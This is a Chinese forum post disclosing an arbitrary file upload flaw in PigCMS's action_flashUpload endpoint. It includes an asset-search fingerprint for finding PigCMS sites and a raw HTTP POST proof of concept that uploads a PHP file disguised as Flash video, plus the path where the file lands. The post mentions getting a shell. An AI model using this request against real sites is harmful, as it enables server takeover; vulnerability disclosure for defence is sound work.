登录/ 注册
 找回密码
 立即注册
关闭

CSDN热搜

程序园 精品问答 技术交流 资源下载
返回列表 发新帖
首页 资源区 程序 PigCMS action_flashUpload 任意文件上传漏洞

PigCMS action_flashUpload 任意文件上传漏洞

anyue1937 2025-10-15 20:07:52
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面
![image-20230828161452591](images/image-2050828161452591.png)
验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```
![image-20230828161506565](images/image-20230828161506565.png)
```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透漏洞getshell

使用道具 举报

相关推荐
映各
5 天前

举报

感谢分享,学习下。
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册
发帖
anyue1937
5 天前

0

粉丝关注

3

主题发布

板块介绍填写区域,请于后台编辑
微信扫一扫